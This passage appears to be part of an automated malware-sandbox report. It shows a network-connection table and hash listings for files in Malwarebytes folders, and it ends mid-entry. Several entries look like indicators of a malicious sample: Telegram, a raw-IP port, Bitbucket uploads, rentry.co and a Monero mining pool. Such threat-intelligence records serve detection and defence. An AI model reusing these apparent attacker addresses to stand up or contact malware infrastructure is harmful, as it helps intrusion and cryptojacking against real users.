| DE | 162.19.138.120:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 3.233.93.158:443 | bcp.crwdcntrl.net | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.119.119.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.100.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.107.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.39.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.93.233.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| IE | 67.220.228.200:443 | aax-eu.amazon-adsystem.com | tcp |
| DK | 37.157.6.241:443 | c1.adform.net | tcp |
| NL | 172.217.168.226:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| NL | 173.223.116.20:443 | contextual.media.net | tcp |
| NL | 104.85.0.200:443 | ads.pubmatic.com | tcp |
| US | 199.127.204.147:443 | sync.1rx.io | tcp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 54.234.180.12:443 | sync.srv.stackadapt.com | tcp |
| US | 192.132.33.46:443 | bttrack.com | tcp |
| US | 192.184.69.201:443 | cms.quantserve.com | tcp |
| US | 8.8.8.8:53 | 200.228.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.6.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 70.42.32.223:443 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | 20.116.223.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.180.234.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.32.42.70.in-addr.arpa | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 3.221.100.88:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | stags.bluekai.com | udp |
| NL | 23.222.37.108:443 | stags.bluekai.com | tcp |
| US | 8.8.8.8:53 | 88.100.221.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.37.222.23.in-addr.arpa | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | eu-u.openx.net | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | links.malwarebytes.com | udp |
| US | 8.8.8.8:53 | lic-iris-content-prod.mwbsys.com | udp |
| US | 18.65.39.48:443 | lic-iris-content-prod.mwbsys.com | tcp |
| NL | 52.222.139.112:443 | links.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 48.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.102.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 5.75.214.16:12771 | 5.75.214.16 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.214.75.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.195.9:443 | bbuseruploads.s3.amazonaws.com | tcp |
| NL | 54.192.87.164:80 | ocsp.r2m01.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.195.231.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.87.192.54.in-addr.arpa | udp |
| NL | 142.250.179.138:443 | translate-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | sirius.mwbsys.com | udp |
| US | 34.231.233.183:443 | sirius.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| NL | 52.222.139.14:443 | cdn.mwbsys.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 5.75.214.16:12771 | 5.75.214.16 | tcp |
| NL | 142.250.179.138:443 | translate-pa.googleapis.com | tcp |
| NL | 185.209.161.89:80 | 185.209.161.89 | tcp |
| US | 8.8.8.8:53 | 89.161.209.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 51.68.190.80:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | rentry.co | udp |
| LU | 198.251.88.130:443 | rentry.co | tcp |
| NL | 51.15.58.224:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 130.88.251.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.58.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.138:443 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.138:443 | optimizationguide-pa.googleapis.com | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 2.19.195.233:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| DE | 172.217.23.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.170:443 | optimizationguide-pa.googleapis.com | udp |
Files
| SHA1 | 0f1f046fb3a53530d931f3373bbd6a35922edd49 |
| SHA256 | bac7e659463c89fad1742a7896406c93deba75f6a0217295ba8047e883863df1 |
| SHA512 | 4d75bba8dbaad88c9df30badd4a697739b52d396b3de866b891696a713b0c172ba4817937423bb6defe41cde9815edcb55a7d5f8a708d3ad22e2382457ce25c5 |
C:\Program Files\Malwarebytes\Anti-Malware\offreg.dll
| MD5 | 16663d125398773a90d0a53333b7cf5e |
| SHA1 | f92928ae3c9292588547ceaca1cb1d372bfd7936 |
| SHA256 | 38e6811b47262101759aa51a631263d9e3eee5d211164318a751e078afec4cbc |
| SHA512 | 091764b8ad80aa31eea0bbd91ee505ebdea2654bc8aeaa3081a061d0d37ab13d27dd203075fd0de10c6687591aa0e36139a38af846c4e34e6aa67ab81dc277df |
C:\Program Files\Malwarebytes\Anti-Malware\offreg.dll
| MD5 | 16663d125398773a90d0a53333b7cf5e |
| SHA1 | f92928ae3c9292588547ceaca1cb1d372bfd7936 |
| SHA256 | 38e6811b47262101759aa51a631263d9e3eee5d211164318a751e078afec4cbc |
| SHA512 | 091764b8ad80aa31eea0bbd91ee505ebdea2654bc8aeaa3081a061d0d37ab13d27dd203075fd0de10c6687591aa0e36139a38af846c4e34e6aa67ab81dc277df |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
| MD5 | 5471d57066b9c30fd2ded9353ef0cf85 |
| SHA1 | 21d231c088ac7e983f0d620c3f172fa0fa373e3b |
| SHA256 | 1454ea0493b479bff5c3e27a7600d24f61d107451c05902cc6dff4abf86533f0 |
| SHA512 | 1409a79e6b35253f3276425de518eb760623065c2c6290fffba3fa9b75675b7456b7cd535c54b7a4b9ca3cc5f5df9231727d2d531e9e824e7192c4e03ce23b83 |
C:\Program Files\Malwarebytes\Anti-Malware\PoliciesControllerImpl.dll
| MD5 | 5471d57066b9c30fd2ded9353ef0cf85 |
| SHA1 | 21d231c088ac7e983f0d620c3f172fa0fa373e3b |
| SHA256 | 1454ea0493b479bff5c3e27a7600d24f61d107451c05902cc6dff4abf86533f0 |
| SHA512 | 1409a79e6b35253f3276425de518eb760623065c2c6290fffba3fa9b75675b7456b7cd535c54b7a4b9ca3cc5f5df9231727d2d531e9e824e7192c4e03ce23b83 |
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json
| MD5 | 0aadb1b6b0fcff6dc7b4a946abf181f1 |
| SHA1 | 0191472c05c786e0c51f290900e009f2787ad80b |
| SHA256 | 026be320cbb83c79639b46bbda967dd2c4d95082a932ea91ee850f68fa77a116 |
| SHA512 | 97d1a2eee8092068fa459ffd3483771d97520f564dd840dc4f36fed9ce4b9151f642eb341ccfe5f0932806f2f65a1ed7134bd8032ae0fded9ad1df3a0bf4b5b6 |
C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll
| MD5 | b7e5071b317550d93258f7e1e13e7b6f |
| SHA1 | 2d08d78a5c29cf724bc523530d1a9014642bbc60 |
| SHA256 | 467de01d7cee7ec54166b80658ff22f9feebdb1c24eaf1629cf40e4124508064 |
| SHA512 | 9c35293c95c1a9141740ac99315605964aa37c4a42d3a11cae9e5649ff1427a9480d3d5e7f763212cf13db3511c5ea3c84e68f95f0067fe6339a9d3fb7b27c54 |
C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll
| MD5 | b7e5071b317550d93258f7e1e13e7b6f |
| SHA1 | 2d08d78a5c29cf724bc523530d1a9014642bbc60 |
| SHA256 | 467de01d7cee7ec54166b80658ff22f9feebdb1c24eaf1629cf40e4124508064 |
| SHA512 | 9c35293c95c1a9141740ac99315605964aa37c4a42d3a11cae9e5649ff1427a9480d3d5e7f763212cf13db3511c5ea3c84e68f95f0067fe6339a9d3fb7b27c54 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\LicenseControllerImpl.dll
| MD5 | 1e102c36c622f1a221f9c7af8a96a6c2 |
| SHA1 | 0e350dfa57a7c2c8d4daddc77d4b9da539a917c9 |
| SHA256 | 0be22af897b18d15f739363d32ffdcd5f4cdf1e0973dd1dffb949ac3b64e2dca |
| SHA512 | 4c3262d53c9e9508dcaf70bf58c5c9a2b501274fabec186533e21ae6e988d0f54518672b60909901de79c5ade2f6b1d8d7bdc0b29b9150c94e7a28a3e85ef818 |
C:\Program Files\Malwarebytes\Anti-Malware\LicenseControllerImpl.dll
| MD5 | 1e102c36c622f1a221f9c7af8a96a6c2 |
| SHA1 | 0e350dfa57a7c2c8d4daddc77d4b9da539a917c9 |
| SHA256 | 0be22af897b18d15f739363d32ffdcd5f4cdf1e0973dd1dffb949ac3b64e2dca |
| SHA512 | 4c3262d53c9e9508dcaf70bf58c5c9a2b501274fabec186533e21ae6e988d0f54518672b60909901de79c5ade2f6b1d8d7bdc0b29b9150c94e7a28a3e85ef818 |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | f782ef057fc2e4a54c9f424413f277ae |
| SHA1 | 2a23622ec49268500afe42d9174ac86844f7298b |
| SHA256 | d620750c3fcc3f858e391996d1c37c1e7066c8133f0f16750db95d4a761ad6c1 |
| SHA512 | bb2dc0e456fe4d4820fbb8ba07b0935325b325a1ff4093e5a686088c2d44ae746b6c7c6a3ddceaacbd2cfa4cdd41341c2c70218e2eb67cceacd6cb395c43ca1a |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\UpdateControllerImpl.dll
| MD5 | c1242a30d1eb5efc086797c7b05dcca5 |
| SHA1 | a43a4e6df9673e3c9783bd9f1af66f3b79c7a1c2 |
| SHA256 | f556d2524500661fb8710aeac582b08763a75380faf8c6bceabb31abff89edbe |
| SHA512 | 89e2ed95e778a93846fa71db9b81d64c6f1075d731f8f7aec61e5c913f1887540ff9ae2cd42e4c0cae934089b960276e0e3ea80e886de06d0aaf4734c7fdf77b |
C:\Program Files\Malwarebytes\Anti-Malware\UpdateControllerImpl.dll
| MD5 | c1242a30d1eb5efc086797c7b05dcca5 |
| SHA1 | a43a4e6df9673e3c9783bd9f1af66f3b79c7a1c2 |
| SHA256 | f556d2524500661fb8710aeac582b08763a75380faf8c6bceabb31abff89edbe |
| SHA512 | 89e2ed95e778a93846fa71db9b81d64c6f1075d731f8f7aec61e5c913f1887540ff9ae2cd42e4c0cae934089b960276e0e3ea80e886de06d0aaf4734c7fdf77b |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 6dbd996e0236e2b3dc6ac3454aeee68e |
| SHA1 | 7fccfb10547a9aa78bd81557fb6225b00cfe4ca8 |
| SHA256 | b8a554b45d7c6664454daf3c2dbe293f8d19cc859a2f9cc964b223e9a0c162f1 |
| SHA512 | 274c5c0362b082baa8aaad0cc6a1cea2bd80f6d4f13ac1aea8cbadfd0490898b3c1f8bb010365efdcb0d7e7f4638966c683032793895e75637502cb5737295e3 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\version.dat
| MD5 | bc1829ff624943dba1e2b0c486119585 |
| SHA1 | bfe8e65737fd67c3300b1a3b653f69473855f2c7 |
| SHA256 | 83856b2e251983352b0792e0c7584e03b2ab9885182bae1a29bddd391f9b58dc |
| SHA512 | d92cc3e309b8d99a17270b2211b67c98005bf52ef578ef047cf28a115d488c0aa57fc7e310aac3e0b47f78ace31c6bb2a1204ab327517abda6d663f66adcd004 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\pkgvers.dat
| MD5 | 18074b19515da6a6a2ef6cf45e840b52 |
| SHA1 | 44a5ea1137e12b4c2c4253f3c93fde14796c9f96 |
| SHA256 | 1b24c34b4bc74b640a1785debafc254872b17cbf670ef7d5a8411c0347544ca6 |
| SHA512 | b469191c3bebefe5d9b6056f9843c2d5000577a890d1db4335178480cca4b8feccbe6d24a77adcdd7aec58aaa557d843ceee03c279ae5fc1166b9f829d97c5fd |
C:\ProgramData\Malwarebytes\MBAMService\pkgvers.dat
| MD5 | 18074b19515da6a6a2ef6cf45e840b52 |
| SHA1 | 44a5ea1137e12b4c2c4253f3c93fde14796c9f96 |
| SHA256 | 1b24c34b4bc74b640a1785debafc254872b17cbf670ef7d5a8411c0347544ca6 |
| SHA512 | b469191c3bebefe5d9b6056f9843c2d5000577a890d1db4335178480cca4b8feccbe6d24a77adcdd7aec58aaa557d843ceee03c279ae5fc1166b9f829d97c5fd |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json.bak
| MD5 | 75da0d4903434d6f0fe12083a5ec0b69 |
| SHA1 | f790e283061b8a4cfbcffa2541b6b3f5e0e4f3e5 |
| SHA256 | e8e0961607bac30a26302dde3973ca5afbcf15a9550e51dc4091af3da7f2a2f9 |
| SHA512 | 988fa0a4e9bf320ba9cc858d626b7645b0a77774dff73cd865f1c0f7f0e985f1b082a22de1cf5d95900f1e0baf9295a928e3069b52d8c5cf1862dccba411e374 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json.bak
| MD5 | 364876fe843a947e26b190667e3bc303 |
| SHA1 | fe0e964602f8e29a5e4aeb3019ce610252a5c1fb |
| SHA256 | e6ee482490676ebb60dbd6c4ad0cb9ef77bb8b65b67ba9df935b3454dcf4de4d |
| SHA512 | dcfa0ac3372cdd836995ece5914b9ab07c5d2085a244d2132cb1c9fbd6c6d4a9061bc97d09ea0d9ae168a56d2d16dad9c198902db52437acae00660a8e6c6c65 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 53b0988cd11081cc94979369477a5e5d |
| SHA1 | 678c6a9262652a45ddd65b27a166275323ace62b |
| SHA256 | ebb7081eedd2b0baafcc73c195c6dab19dae1796cba0041075b7bbb1c7d3fd51 |
| SHA512 | fcf0dbe6517b59214328865b448011fb0e66c5fe95f3467df1a8ae643d571a1d65e66d056f9e9ab285587e5b47a2a47be91f89d686be4aa8dfb006be83304e06 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\rules.mbdb
| MD5 | 290695e0da2d06daf3ec83ed74c62b1e |
| SHA1 | d5230cd7248173cfdb085676be454fea7cc40b2a |
| SHA256 | e708e9fa65efcb00f5771ac6ead3b39a051e38dc40f3fb6e787971ffc6e27fd7 |
| SHA512 | 76536a37d3bf8ae2f261d6ef33a2fc48fb10e2d4bbfb5bcf46cbfe49cf52424036a6b793901497d97703ed09d754cf39d91cf0f01cf8787dd0df9aee73536856 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\rdefs.mbdb
| MD5 | 2f7423ca7c6a0f1339980f3c8c7de9f8 |
| SHA1 | 102c77faa28885354cfe6725d987bc23bc7108ba |
| SHA256 | 850a4ea37a0fd6f68bf95422d502b2d1257264eb90cc38c0a3b1b95aa375be55 |
| SHA512 | e922ac8a7a2cde6d387f8698207cf5efbd45b646986a090e3549d97a7d552dd74179bd7ac20b7d246ca49d340c4c168982c65b4749df760857810b2358e7eb69 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\prot.mbdb
| MD5 | 546d9e30eadad8b22f5b3ffa875144bf |
| SHA1 | 3b323ffef009bfe0662c2bd30bb06af6dfc68e4d |
| SHA256 | 6089fbf0c0c1413f62e91dc9497bedc6d8a271e9dc761e20adc0dccf6f4a0c1f |
| SHA512 | 3478f5dcf7af549dd6fe48ad714604200de84a90120b16a32233b6d44fa7240f5f4e5fe803f54b86bbdfd10fa1bfdd88fb85eb6a78e23e426933f98d0a2565ec |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\clean.mbdb
| MD5 | 6f9b49be0223ac79a713fb1472f890bd |
| SHA1 | 6d89aea5a4823556b005a381b9334acb68a01210 |
| SHA256 | 33a14b9ff0c92254945b0495a822611a0170daf4c0ce0dc4203a181c678dbb78 |
| SHA512 | 7b8df6420fd719fccbe1c4a7874514362ca06e20cd12dc3f788ebaaa3150e301d0e975b50bb52d1bf99f7f835b1ebf45fadc53fe7be9fdf74777ff90c1ffd95f |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\mbdigsig2.dat
| MD5 | 7bc7edd4b9d67db19a5b82a609faa1dd |
| SHA1 | e5e4c523f048b152ffb17ab7292da84092aa15f9 |
| SHA256 | 3fdfb23410f2730aaf15e08a0a77a4407701bd935e223ff97e7ca1c5f21d9159 |
| SHA512 | 122a442182cd37db45bc2ae3c81cee35a279925582405d42d09b25091df337ea71b184ef12fb9f3df8f496f2e546babed992056f7abf1eba5e98b9be2d53abea |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbmanifest2.dat
| MD5 | 837a1910b55ca05e1a9df39f4339815f |
| SHA1 | 3fca05dbb2f7e0260fb109c72cb19defbb356e63 |
| SHA256 | 114b9e48630535cdd5381d65f543f52e73294eed8577a55718697f1d76ab9e85 |
| SHA512 | 7d5716b353b007c0a0f34fad484a72ef0e9b4dc0d1260b98a4b19c2c5d6f760799b58ef44e5246926d7e83a8d62c717dcecbc5df175285088bc0691a3c8d6bf3 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 1db9fa09653bd40e9347cbd16134cd14 |
| SHA1 | 040b3cde61254e3ddf29d62194acb4c5a6932a4d |
| SHA256 | 25b798b7a793787b772296db40af15d02fb6bc41e1b67a4ad4a9b2a66caaf855 |
| SHA512 | b34a66bc56ea2b73727fe297a33efdb563dd3a9b6c193fc8a7a66bfdad525bd20d994e712b0d5bf8f8dfa210a28e52a554d83b1075cf9bcbe147c3b9f7e95275 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\scan.mbdb
| MD5 | fd629a7744a8a982987e5853cbb8ba22 |
| SHA1 | 70ee4a789487c48c7cb6e18c759442825283daea |
| SHA256 | a14c9b4248982096de6ed3c32cbb21be99e4ca488c0d42452cd5c506e97e5acf |
| SHA512 | b28395947a7823f8ec47149a23ecdb849e081c0d463e4af5ce6db796dc143d5f0de0f0926c96e2c971371b66aa04f51682ce2e8ad7cd2b4010280967adf504ae |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\wprot2.mbdb
| MD5 | 6eee951d18f70fff2a512c8365ef9182 |
| SHA1 | cfb5f7b66fddf311023edc934732292b21305364 |
| SHA256 | d2199fa23fbe0651428896cb66cbf99357a55ffe62916e48287e6ae525fce0b6 |
| SHA512 | b7cccdb3878be4fcfa7cf3699f7e56006de60e99e326e6adf5694e14483852758d6d3c24be9028d2ee7ecdee489c5455a7574df3062901504ba44ec637ad268d |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\tids.mbdb
| MD5 | db3b61462e0ff450528e5dd2f0802413 |
| SHA1 | fcf8131b740e4cbb621d929d7e7727d662837511 |
| SHA256 | 627ba84b29dfba6ea50a9c23fe07ed4ab8a676cf1bc8104197a4909cdaa14a48 |
| SHA512 | 487713c8ad5966171a8a28b66414eebedf9f02ab9067ce357a1aa1ffd1f5a39b0f3aed069fdce8d29af908279a9fb6c1bced7a8abd8fd1238374a5ae97ad61f0 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dynconfig.dat
| MD5 | 10f23e7c8c791b91c86cd966d67b7bc7 |
| SHA1 | 3f596093b2bc33f7a2554818f8e41adbbd101961 |
| SHA256 | 008254ca1f4d6415da89d01a4292911de6135b42833156720a841a22685765dc |
| SHA512 | 2d1b21371ada038323be412945994d030ee8a9007db072484724616c8597c6998a560bc28886ebf89e2c8919fb70d76c98338d88832351823027491c98d48118 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\Global.sr
| MD5 | 8bb892b7f81d7161d5d85e51fd1b7a2a |
| SHA1 | eb33a87ec3d98c923fec7d3b2e06b8dbee8892dd |
| SHA256 | 89a39421687a1cdd1bc86c4b4b30c7b291072d623d048019b107f0f9ef9b70b5 |
| SHA512 | 493228e1e6be38ddd801bf834cb567e013bad9c3b66e2448792021772ef57df46ec82239c085657f40c216a693caf50775836d25834914440d0d4ff69e603d55 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\exclusions.txt
| MD5 | aef4eca7ee01bb1a146751c4d0510d2d |
| SHA1 | 5cf2273da41147126e5e1eabd3182f19304eea25 |
| SHA256 | 9e87e4c9da3337c63b7f0e6ed0eb71696121c74e18a5da577215e18097715e2f |
| SHA512 | d31d21e37b0048050b19600f8904354cff3f3ec8291c5a7a54267e14af9fb88dfb6d11e74a037cc0369ade8a8fb9b753861f3b3fb2219563e8ec359f66c042db |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\Global.nm
| MD5 | 50ab18bf9db8e057ebc7fa36e5d30bbb |
| SHA1 | 7ae11851be482ef8779c6b6941911080c6217bbd |
| SHA256 | b969dda90c2e56f9a0a00a0aa028850b940312f7e508819b72d2b0bbe4535469 |
| SHA512 | 056ac064d02619c6e2bd803c07a88e8293afdef08d81a301da1bfcb406af554d8644275778915ff80ddbf47cea09466f4b2b1877f7157798a8d98e8a2d864cc0 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\BrowserSDKDLL.dll
| MD5 | 1ed53171d00f440f29a12f9beb84dac4 |
| SHA1 | 4d9a1e3579b0999f1ab2fa818b588411e9ee920c |
| SHA256 | e659e687a872050f9e65d78992d16bd9b393cf3f8e8c94e0e15fb42b7065327e |
| SHA512 | 17161cfc672d1b996b8af4ebac17f9a8a3807f38c9a23e2e5b4dadcd9a21c3a64faec9bf59147022a9df88b80f89300f1b537091289bd7a42806bd206a317e6e |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\sample.dll
| MD5 | 936021397e23fc913c55992ce9468913 |
| SHA1 | d65af889a379f2982b1ebf29d83d2783b9aa0ded |
| SHA256 | ce7bdd309701942d97bd8cd3c2455a8d37d93b4d9ce4c14986703daf46fab7fb |
| SHA512 | 4fb968bee32b5f2b5a5d1629ec2855dc0150ec6b753e83a457ec704350b1f219b5e1349a75ec41f94757d1ef2de9a020933f8e42566bf6123543b7709ecc3d74 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\sample.dll
| MD5 | 936021397e23fc913c55992ce9468913 |
| SHA1 | d65af889a379f2982b1ebf29d83d2783b9aa0ded |
| SHA256 | ce7bdd309701942d97bd8cd3c2455a8d37d93b4d9ce4c14986703daf46fab7fb |
| SHA512 | 4fb968bee32b5f2b5a5d1629ec2855dc0150ec6b753e83a457ec704350b1f219b5e1349a75ec41f94757d1ef2de9a020933f8e42566bf6123543b7709ecc3d74 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\ig.exe
| MD5 | 14cd82fe89752e3723a9b42aaa68763a |
| SHA1 | ea407d8d7064581406eb1b14e0f01cee61afb252 |
| SHA256 | 60e6029bdf3a2d88772bd4ec3aea6b688505e7dfcb76ce371d6942e9de95ce04 |
| SHA512 | 16114ff38a2e2cc59a9bbf420304fda8e558022f385748a5f48c02f037cbe815221a1cb4f0ac1deeb408ebf66ee3e25c059b157c7cc5cb169dbac75a73694fdc |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
| MD5 | 14cd82fe89752e3723a9b42aaa68763a |
| SHA1 | ea407d8d7064581406eb1b14e0f01cee61afb252 |
| SHA256 | 60e6029bdf3a2d88772bd4ec3aea6b688505e7dfcb76ce371d6942e9de95ce04 |
| SHA512 | 16114ff38a2e2cc59a9bbf420304fda8e558022f385748a5f48c02f037cbe815221a1cb4f0ac1deeb408ebf66ee3e25c059b157c7cc5cb169dbac75a73694fdc |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\BrowserSDKDLL.dll
| MD5 | 1ed53171d00f440f29a12f9beb84dac4 |
| SHA1 | 4d9a1e3579b0999f1ab2fa818b588411e9ee920c |
| SHA256 | e659e687a872050f9e65d78992d16bd9b393cf3f8e8c94e0e15fb42b7065327e |
| SHA512 | 17161cfc672d1b996b8af4ebac17f9a8a3807f38c9a23e2e5b4dadcd9a21c3a64faec9bf59147022a9df88b80f89300f1b537091289bd7a42806bd206a317e6e |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\MBAMCore.dll
| MD5 | b2216df400c3ef59f9406831ba7956b5 |
| SHA1 | 1e26588190fc8a608e773239d498ceb79a92fca3 |
| SHA256 | 1e429ee1da8a0fe6569673b7052c5f49c193aaa8f3152451f645539a431b792d |
| SHA512 | 3aa3c9ed3bcaa0f2b7c4de36f7a83e35e8abf63c972c8e5377915bed41a803ae516cf8ef14e9c455043dd1ae46e4aec1820fa3572e65d0c87a99eac1d43d1f40 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MBAMCore.dll
| MD5 | b2216df400c3ef59f9406831ba7956b5 |
| SHA1 | 1e26588190fc8a608e773239d498ceb79a92fca3 |
| SHA256 | 1e429ee1da8a0fe6569673b7052c5f49c193aaa8f3152451f645539a431b792d |
| SHA512 | 3aa3c9ed3bcaa0f2b7c4de36f7a83e35e8abf63c972c8e5377915bed41a803ae516cf8ef14e9c455043dd1ae46e4aec1820fa3572e65d0c87a99eac1d43d1f40 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Actions.dll
| MD5 | 1eff53d95ecaf6bbfffe80d866d8e1dd |
| SHA1 | d7ef7d7c77fd04b2c0eb8c16bb3cd08057f6742f |
